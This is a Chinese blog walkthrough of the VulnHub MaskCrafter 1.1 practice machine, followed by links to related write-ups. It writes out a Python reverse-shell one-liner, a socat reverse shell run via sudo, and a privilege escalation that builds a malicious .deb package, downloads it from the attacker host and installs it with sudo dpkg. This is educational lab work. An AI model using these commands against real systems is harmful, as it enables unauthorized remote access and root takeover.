vulnhub-maskcrafter-渗透笔记

最新推荐文章于 2023-02-12 15:52:44 发布
最新推荐文章于 2023-02-12 15:52:44 发布
阅读量201 收藏
点赞数
分类专栏: vulnhub 文章标签: vulnhub Vulnhub 渗透测试靶机
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yutianovo/article/details/106130547
版权

介绍

Target audience: Beginners

https://www.vulnhub.com/entry/maskcrafter-11,445/

主机发现

YmNKk6.png

信息搜集

使用nmap扫描

YmN1pD.png

开放21端口 可以匿名登陆

ftp登陆

YmNm01.png

可看到目录下有俩个文件
img-nFPWvnPS-1589467129182]

将它下载下来

get NOTES.txt
get cred.zip

YmNQfO.png

提示

1、请为/debug目录设置一个更强的密码,用户名为admin 

2、可以SQL注入

cred.zip需要密码才能解压

目录扫描

img-n1yURNrr-1594718256327

接下来访问网页

http://192.168.217.147/debug/

YmN86H.png

需要验证才能登陆,根据刚才提示输入admin、admin后成功登陆

网页可以执行命令,
YmN31e.png

使用python反弹shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.217.23",2233));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

![YmNGXd.png](https://imgconvert.csdnimg.cn/aHR0cHM6Ly9zMS5heDF4LmNvbS8yMDIwLzA1LzA3L1ltTkdYZC5wbmc?x-oss-process=image/format,png#vwid=435&vhei=91

成功反弹

提权阶段

查看db.php

YmNt0I.png

里面有数据库密码,使用phpmyadmin登陆

YmNN7t.png

mydatabase里有两张表

creds

YmNaAP.png

login

YmNdtf.png

现在,我们得到了一个zip压缩包的密码

YmNwh8.png

内容为一个用户的密码

切换用户,查看权限,可以使用 .sh脚本不需要密码登陆用户

YmNB9S.png

写入命令

echo "/bin/bash"> whatsmyid.sh

执行 sudo -u evdaez ./whatsmyid.sh 提权到evdaez用户

YmND1g.png
YmNrcQ.png

socat 相关文章https://www.sohu.com/a/161766202_709042

kali监听

socat file:`tty`,raw,echo=0 tcp-listen:4444

在靶机执行

sudo -u evdaez /usr/bin/socat socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.217.23:4444

成功反弹

YmNsXj.png

接下来在kali执行

gem install fpm
T=$(mktemp -d)
echo 'exec /bin/bash' > $T/c.sh
fpm -n x -s dir -t deb -a all --before=install $T/c.sh $T

使用python开启临时服务器

python -m SimpleHTTPServer  80

在靶机上下载刚刚的文件

wget http://192.168.217.23/x_1.0_all.deb

sudo dpkg -i x_1.0_all.deb

成功提权

在这里插入图片描述

赛博雨天
关注
专栏目录
VulnHub-Tr0ll1.zip
01-12
VulnHub-Tr0ll1靶机学习笔记,一部分是学习笔记过程,另一部分是学习过程整理的lol.pacp\.c文档、user.txt等文档,供大家参考学习
vulnhub靶机sunset:decoy渗透笔记
liver100day的博客
08-03 1246
这里写目录标题1.环境搭建2.信息收集2.1 主机发现2.2 端口扫描2.3 访问80端口(http服务)3. 漏洞利用3.1 使用压缩包密码破解工具爆破压缩文件密码3.2 爆破用户密码3.3 ssh登录4.提权5.总结 1.环境搭建 靶机环境搭建 攻击渗透机: kali IP地址:192.168.33.139 靶机:sunset:decoy IP地址未知 靶机下载地址:https://www.vulnhub.com/entry/sunset-decoy,505/ 2.信息收集 2.1 主机发现 要进行渗透
Vulnhub:maskcrafter-1.1靶机
qq_43884092的博客
02-12 68
使用账号密码:web|P@ssw0rdweb,登录mysql查看mydatabase数据库中的creds表获得cred.zip压缩包的密码。使用burp抓包替换执行的命令为反弹shell,反弹shell需要url编码后才能执行。安装好fpm后在kali上运行以下命令,运行之后会生成x_1.0_all.deb软件包。访问debug目录,使用弱口令:admin|admin登录后发现可以执行命令。查看/var/www/html/db.php获得mysql数据库账号密码。解压后获得userx用户的密码。
VulnHub靶机渗透】九:maskcrafter-1.1
野原新之助
05-29 872
靶机设定敏感信息泄露、Web漏洞以及系统中sudo权限的不安全配置等漏洞。 VulnHub是一个安全平台,内含众多渗透测试的靶场镜像,只需要下载至本地并在虚拟机上运行,即可得到一个完整的渗透测试练习系统,每一个靶机都有目标去完成,大多是拿到root权限。
vunhub 靶机之旅-1
ashen的博客
12-08 1014
youtube视频: https://www.youtube.com/watch?v=SerBliNAh1k nmap -A 同时打开操作系统指纹和版本检测 wpscan --url 查找 -e enumerate 列举 --enumerate u列举用户 Examples : 帮助 -Further help … ruby ./wpscan.rb --help 做“非侵入性”检查 -Do ‘...
VulnHub靶机maskcrafter-1.1渗透
xingjinhao123的博客
03-04 222
靶机介绍 官方下载地址:http://www.vulnhub.com/entry/maskcrafter-11,445/ 这个靶机有两种办法获取用户,两种办法获取root,不需要暴力破解 运行环境: 靶机:网络设为NAT模式,IP地址:192.168.174.136 攻击机:同网段下的kali linux,IP地址为:192.168.174.135 开始渗透 运行靶机 获取靶机IP地址 扫描端口及其服务 这里看到了很多端口一个一个访问 先访问21端口的ftp服务 将pub目录下的两个文件下载到本
冰河的渗透实战笔记-冰河.pdf
05-18
冰河整理的全网首个开源的以实战案例为背景的渗透实战笔记,全书共442页,共计37万字(不计空格)。整本书的内容涵盖:Kali基础、渗透工具、木马制作、钓鱼链接生成、爆破密码、内存溢出攻击、web渗透、数据提权、...
网络安全-渗透完整笔记
最新发布
03-27
网络安全中的渗透测试是一种合法的、经过授权的模拟黑客攻击行为,旨在评估并增强网络系统安全性。渗透测试通过发现和利用系统中的弱点、技术缺陷或漏洞,帮助企业和组织识别潜在的安全风险,确保网络防御机制的有效...
JavaScript-笔记.pdf
11-28
JavaScript-笔记.pdf
javase-学习笔记.pdf
11-28
javase-学习笔记.pdf
vulnhub靶场,MASKCRAFTER-1.1
kukudeshuo的博客
09-13 350
vulnhub靶场,MASKCRAFTER-1.1 环境准备 靶机下载地址:https://www.vulnhub.com/entry/maskcrafter-11,445/ 攻击机:kali(192.168.109.128) 靶机MASKCRAFTER-1.1(192.168.109.179) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息收集 使用arp-scan确定目标靶机 确定目标靶机IP为192.168.109.179
VulnHub breach1.0
jelly
07-12 1011
配置靶机网络 作者提示:The VM is configured with a static IP address (192.168.110.140) so you will need to configure your host-only adaptor to this subnet. 意思是靶机已经配置了静态IP地址为192.168.110.140,所以为了和靶机通行需要把kali主机的网卡设置一下。 这里在virtualbox中可以配置一块新的网卡,为了在同一地址段,设置如下。 ...
vulnhub靶机-sunset:decoy
臭nana的博客
07-20 1782
1、找到靶机ip:192.168.0.129 nmap -sn 192.168.0.0/24 2、扫描靶机端口,除了22、80是开放状态,其他几个都是过滤状态 root@kali:~# nmap -p- -A 192.168.0.129 Starting Nmap 7.80 ( https://nmap.org ) Nmap scan report for 192.168.0.129 Host is up (0.0057s latency). Not shown: 65528 closed p
Vulnhub靶机渗透学习——DC-9
qq_45612828的博客
07-02 3184
Vulnhub靶机渗透学习——DC-9
vulnhub sunset: decoy
箭雨镜屋
03-27 764
nmap扫描 ---- fcrackzip破解save.zip密码 ---- john暴力破解shadow中普通用户密码 ---- rbash绕过 ---- 发现并执行chkrootkit ---- 利用chkrootkit 0.49的漏洞提权
Python中的垃圾回收机制(用析构函数做简单测试)
野原新之助
06-03 549
概述: Python中使用引用计数的方法实现垃圾回收,当一个对象被引用一次时,计数加一,被释放一次时,计数减一。当计数器为0时,计算机则收回这些内存并释放。 对象被释放后,其内部的方法将不得通过此对象调用。 那么对象何时会被释放(销毁)? 测试: 程序结束时 定义一个类并初始化析构函数内容: class Person: def say(self): print("这里是...
vulnhub-sunset: decoy-wp
yutianovo的博客
07-14 433
靶机信息 blog:http://blog.yutian233.xyz/ Easy/Intermediate (May variate depending on your background) It is recommended to run this machine in Virtualbox. This works better with VirtualBox rather than VMware https://www.vulnhub.com/entry/sunset-decoy,505/
vulnhub-So Simple 1
yutianovo的博客
08-10 1536
靶机描述 This is an easy level VM with some rabbitholes. Enumeration is key to find your way in. There are three flags (2 user and 1 root flag). The VM is tested on Virtualbox. After the startup it shows the IP address. Share your rootflag with me on Twitter
vulnhub-Tiki - 类oscp靶机攻略1
yutianovo的博客
07-14 1308
本文为类oscp靶机打靶1
UCOS-II移植ARM初学者读书笔记
资源摘要信息:"UCOS-II操作系统笔记,主要为初学者学习操作系统提供辅助材料。笔记涵盖了UCOS-II操作系统的核心概念、特点以及在ARM平台上的移植过程。文档名为UCOS-II移植ARM的读书笔记.doc,附带了相关资料的下载...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值